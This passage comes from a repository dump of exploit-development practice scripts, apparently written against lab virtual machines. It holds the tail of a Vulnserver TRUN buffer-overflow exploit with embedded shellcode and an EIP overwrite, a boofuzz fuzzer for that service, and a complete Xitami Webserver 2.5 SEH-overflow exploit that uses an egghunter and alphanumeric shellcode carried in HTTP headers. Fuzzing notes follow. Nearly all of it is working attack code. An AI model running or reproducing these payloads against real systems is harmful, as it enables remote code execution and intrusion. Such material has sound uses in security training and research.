"\xee\x23\xd2\x4b\x41\x94\x90\x19\x6e\x5f\xf4\x89" 18 | shellcode += "\xe5\x2d\xd1\xbe\x4e\x9b\x07\xf1\x4f\xb0\x74\x90" 19 | shellcode += "\xd3\xcb\xa8\x72\xed\x03\xbd\x73\x2a\x79\x4c\x21" 20 | shellcode += "\xe3\xf5\xe3\xd5\x80\x40\x38\x5e\xda\x45\x38\x83" 21 | shellcode += 
"\xab\x64\x69\x12\xa7\x3e\xa9\x95\x64\x4b\xe0\x8d" 22 | shellcode += "\x69\x76\xba\x26\x59\x0c\x3d\xee\x93\xed\x92\xcf" 23 | shellcode += "\x1b\x1c\xea\x08\x9b\xff\x99\x60\xdf\x82\x99\xb7" 24 | shellcode += "\x9d\x58\x2f\x23\x05\x2a\x97\x8f\xb7\xff\x4e\x44" 25 | shellcode += "\xbb\xb4\x05\x02\xd8\x4b\xc9\x39\xe4\xc0\xec\xed" 26 | shellcode += "\x6c\x92\xca\x29\x34\x40\x72\x68\x90\x27\x8b\x6a" 27 | shellcode += "\x7b\x97\x29\xe1\x96\xcc\x43\xa8\xfe\x21\x6e\x52" 28 | shellcode += "\xff\x2d\xf9\x21\xcd\xf2\x51\xad\x7d\x7a\x7c\x2a" 29 | shellcode += "\x81\x51\x38\xa4\x7c\x5a\x39\xed\xba\x0e\x69\x85" 30 | shellcode += "\x6b\x2f\xe2\x55\x93\xfa\xa5\x05\x3b\x55\x06\xf5" 31 | shellcode += "\xfb\x05\xee\x1f\xf4\x7a\x0e\x20\xde\x12\xa5\xdb" 32 | shellcode += "\x89\xdc\x92\xe2\x23\xb5\xe0\xe4\xa9\x2a\x6c\x02" 33 | shellcode += "\xa7\xa4\x38\x9d\x50\x5c\x61\x55\xc0\xa1\xbf\x10" 34 | shellcode += "\xc2\x2a\x4c\xe5\x8d\xda\x39\xf5\x7a\x2b\x74\xa7" 35 | shellcode += "\x2d\x34\xa2\xcf\xb2\xa7\x29\x0f\xbc\xdb\xe5\x58" 36 | shellcode += "\xe9\x2a\xfc\x0c\x07\x14\x56\x32\xda\xc0\x91\xf6" 37 | shellcode += "\x01\x31\x1f\xf7\xc4\x0d\x3b\xe7\x10\x8d\x07\x53" 38 | shellcode += "\xcd\xd8\xd1\x0d\xab\xb2\x93\xe7\x65\x68\x7a\x6f" 39 | shellcode += "\xf3\x42\xbd\xe9\xfc\x8e\x4b\x15\x4c\x67\x0a\x2a" 40 | shellcode += "\x61\xef\x9a\x53\x9f\x8f\x65\x8e\x1b\xbf\x2f\x92" 41 | shellcode += "\x0a\x28\xf6\x47\x0f\x35\x09\xb2\x4c\x40\x8a\x36" 42 | shellcode += "\x2d\xb7\x92\x33\x28\xf3\x14\xa8\x40\x6c\xf1\xce" 43 | shellcode += "\xf7\x8d\xd0" 44 | 45 | buffer = "TRUN /.:/" + "A" * 2003 46 | # eip: 77E9F8F7 47 | buffer += "\xF7\xF8\xE9\x77" 48 | buffer += "\x90" * 30 49 | buffer += shellcode 50 | 51 | try: 52 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 53 | connect = s.connect((host, port)) 54 | s.send(buffer) 55 | s.close() 56 | 57 | except: 58 | print '\nCannot connect to the server!' 
59 | -------------------------------------------------------------------------------- /Vulnserver/trun-fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from boofuzz import * 4 | 5 | host = '192.168.1.9' #windows VM 6 | port = 9999 #vulnserver port 7 | 8 | def main(): 9 | session = Session(target = Target(connection = SocketConnection(host, port, proto='tcp'))) 10 | 11 | s_initialize("TRUN") 12 | s_string("TRUN", fuzzable = False) 13 | s_delim(" ", fuzzable = False) 14 | s_string("FUZZ") 15 | 16 | session.connect(s_get("TRUN")) 17 | session.fuzz() 18 | 19 | if __name__ == "__main__": 20 | main() 21 | -------------------------------------------------------------------------------- /Xitami Webserver 2.5/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys, os 4 | 5 | 6 | ip = "192.168.1.9" 7 | port = 80 8 | 9 | 10 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x6b\x61\x6c\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 11 | 12 | #offset = "A"* 254 + egghunter + "A"*(304-254-32) 13 | offset = "A"*254 + egghunter + "A"*(304-254-32) 14 | nseh = "\xeb\xcc\x90\x90" 15 | seh = "\x57\xf8\x44" # pop-pop-ret 0x0044f857 16 | 17 | egg = "kalikali" 18 | shellcode = "" 19 | shellcode += "\x89\xe3\xdb\xc9\xd9\x73\xf4\x58\x50\x59\x49\x49" 20 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" 21 | shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" 22 | shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" 23 | shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" 24 | shellcode += "\x39\x6c\x79\x78\x6d\x52\x45\x50\x73\x30\x77\x70" 25 | shellcode += "\x43\x50\x6d\x59\x6d\x35\x30\x31\x6b\x70\x31\x74" 26 | shellcode += "\x6e\x6b\x62\x70\x36\x50\x6c\x4b\x76\x32\x54\x4c" 27 | shellcode += "\x6c\x4b\x73\x62\x46\x74\x6c\x4b\x70\x72\x74\x68" 28 | 
shellcode += "\x56\x6f\x38\x37\x61\x5a\x67\x56\x35\x61\x59\x6f" 29 | shellcode += "\x4c\x6c\x37\x4c\x75\x31\x61\x6c\x36\x62\x44\x6c" 30 | shellcode += "\x65\x70\x6b\x71\x4a\x6f\x54\x4d\x36\x61\x5a\x67" 31 | shellcode += "\x39\x72\x6a\x52\x33\x62\x70\x57\x6e\x6b\x62\x72" 32 | shellcode += "\x52\x30\x6e\x6b\x73\x7a\x35\x6c\x6c\x4b\x32\x6c" 33 | shellcode += "\x47\x61\x34\x38\x5a\x43\x52\x68\x55\x51\x48\x51" 34 | shellcode += "\x66\x31\x4c\x4b\x50\x59\x77\x50\x37\x71\x68\x53" 35 | shellcode += "\x4e\x6b\x70\x49\x52\x38\x39\x73\x36\x5a\x63\x79" 36 | shellcode += "\x4c\x4b\x45\x64\x6e\x6b\x57\x71\x4a\x76\x74\x71" 37 | shellcode += "\x79\x6f\x6e\x4c\x59\x51\x7a\x6f\x76\x6d\x56\x61" 38 | shellcode += "\x4a\x67\x57\x48\x4b\x50\x34\x35\x7a\x56\x44\x43" 39 | shellcode += "\x31\x6d\x6a\x58\x45\x6b\x71\x6d\x67\x54\x43\x45" 40 | shellcode += "\x48\x64\x71\x48\x4e\x6b\x52\x78\x67\x54\x43\x31" 41 | shellcode += "\x58\x53\x33\x56\x6c\x4b\x44\x4c\x32\x6b\x4c\x4b" 42 | shellcode += "\x36\x38\x35\x4c\x73\x31\x58\x53\x4e\x6b\x55\x54" 43 | shellcode += "\x6c\x4b\x45\x51\x7a\x70\x4e\x69\x62\x64\x54\x64" 44 | shellcode += "\x64\x64\x63\x6b\x53\x6b\x75\x31\x33\x69\x73\x6a" 45 | shellcode += "\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x72\x7a" 46 | shellcode += "\x6c\x4b\x54\x52\x48\x6b\x4c\x4d\x53\x6d\x52\x48" 47 | shellcode += "\x45\x63\x37\x42\x65\x50\x35\x50\x65\x38\x50\x77" 48 | shellcode += "\x44\x33\x50\x32\x31\x4f\x46\x34\x43\x58\x30\x4c" 49 | shellcode += "\x31\x67\x61\x36\x36\x67\x6b\x4f\x4e\x35\x4e\x58" 50 | shellcode += "\x6c\x50\x67\x71\x55\x50\x65\x50\x36\x49\x49\x54" 51 | shellcode += "\x62\x74\x36\x30\x35\x38\x67\x59\x6b\x30\x52\x4b" 52 | shellcode += "\x73\x30\x79\x6f\x6a\x75\x66\x30\x36\x30\x36\x30" 53 | shellcode += "\x76\x30\x63\x70\x66\x30\x37\x30\x52\x70\x55\x38" 54 | shellcode += "\x49\x7a\x36\x6f\x39\x4f\x69\x70\x69\x6f\x4e\x35" 55 | shellcode += "\x4c\x57\x32\x4a\x66\x65\x50\x68\x59\x50\x4f\x58" 56 | shellcode += "\x65\x51\x57\x78\x63\x58\x47\x72\x77\x70\x71\x32" 57 
| shellcode += "\x6c\x78\x6c\x49\x4d\x36\x51\x7a\x76\x70\x62\x76" 58 | shellcode += "\x70\x57\x70\x68\x6d\x49\x79\x35\x72\x54\x50\x61" 59 | shellcode += "\x39\x6f\x58\x55\x6c\x45\x59\x50\x42\x54\x64\x4c" 60 | shellcode += "\x79\x6f\x42\x6e\x44\x48\x72\x55\x78\x6c\x70\x68" 61 | shellcode += "\x6c\x30\x6e\x55\x4e\x42\x76\x36\x69\x6f\x78\x55" 62 | shellcode += "\x62\x48\x63\x53\x32\x4d\x45\x34\x47\x70\x4d\x59" 63 | shellcode += "\x38\x63\x73\x67\x42\x77\x72\x77\x64\x71\x6b\x46" 64 | shellcode += "\x30\x6a\x37\x62\x36\x39\x50\x56\x6a\x42\x39\x6d" 65 | shellcode += "\x71\x76\x5a\x67\x53\x74\x37\x54\x67\x4c\x77\x71" 66 | shellcode += "\x73\x31\x6c\x4d\x62\x64\x54\x64\x76\x70\x6b\x76" 67 | shellcode += "\x63\x30\x61\x54\x36\x34\x52\x70\x31\x46\x70\x56" 68 | shellcode += "\x63\x66\x72\x66\x43\x66\x50\x4e\x32\x76\x66\x36" 69 | shellcode += "\x66\x33\x36\x36\x65\x38\x34\x39\x48\x4c\x35\x6f" 70 | shellcode += "\x6e\x66\x4b\x4f\x7a\x75\x6d\x59\x6d\x30\x62\x6e" 71 | shellcode += "\x61\x46\x42\x66\x69\x6f\x76\x50\x63\x58\x56\x68" 72 | shellcode += "\x4f\x77\x37\x6d\x75\x30\x49\x6f\x4b\x65\x6f\x4b" 73 | shellcode += "\x58\x70\x6c\x75\x4d\x72\x76\x36\x72\x48\x39\x36" 74 | shellcode += "\x6a\x35\x4f\x4d\x4d\x4d\x6b\x4f\x4b\x65\x37\x4c" 75 | shellcode += "\x44\x46\x61\x6c\x34\x4a\x6d\x50\x4b\x4b\x49\x70" 76 | shellcode += "\x64\x35\x34\x45\x6f\x4b\x31\x57\x46\x73\x51\x62" 77 | shellcode += "\x72\x4f\x52\x4a\x57\x70\x71\x43\x59\x6f\x4b\x65" 78 | shellcode += "\x41\x41" 79 | 80 | stage1 = offset + nseh + seh 81 | stage2 = egg + shellcode 82 | 83 | request = "" 84 | request += "GET / HTTP/1.1\r\n" 85 | request += "Host: 192.168.1.9" + stage2 + "\r\n" 86 | request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n" 87 | request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 88 | request += "Accept-Language: en-US,en;q=0.5\r\n" 89 | request += "Accept-Encoding: gzip, deflate\r\n" 90 | request += "Connection: 
close\r\n" 91 | request += "Upgrade-Insecure-Requests: 1\r\n" 92 | request += "If-Modified-Since: Thu, " + stage1 + "\r\n\r\n" 93 | 94 | 95 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 96 | s.connect((ip,port)) 97 | s.send(request) 98 | s.close() 99 | -------------------------------------------------------------------------------- /Xitami Webserver 2.5/fuzz: -------------------------------------------------------------------------------- 1 | GET / HTTP/1.1 2 | Host: 192.168.1.9 3 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 4 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 5 | Accept-Language: en-US,en;q=0.5 6 | Accept-Encoding: gzip, deflate 7 | Connection: close 8 | Upgrade-Insecure-Requests: 1 9 | If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMT 10 | Cache-Control: max-age=0 11 | 12 | Create a fuzzing script with boo-gen using HTTP request 13 | python boo-gen.py get.txt 14 | 15 | Vulnerable: 16 | If-Modified-Since: Wed, 17 | 18 | s_string("If-Modified-Since: Sat,", name="If-Modified-Since", fuzzable = False) 19 | s_delim(" ", name="space-10", fuzzable = False) 20 | s_string("15 Jun 2019 01:36:09 GMT", name="If-Modified-Since-Value") 21 | --------------------------------------------------------------------------------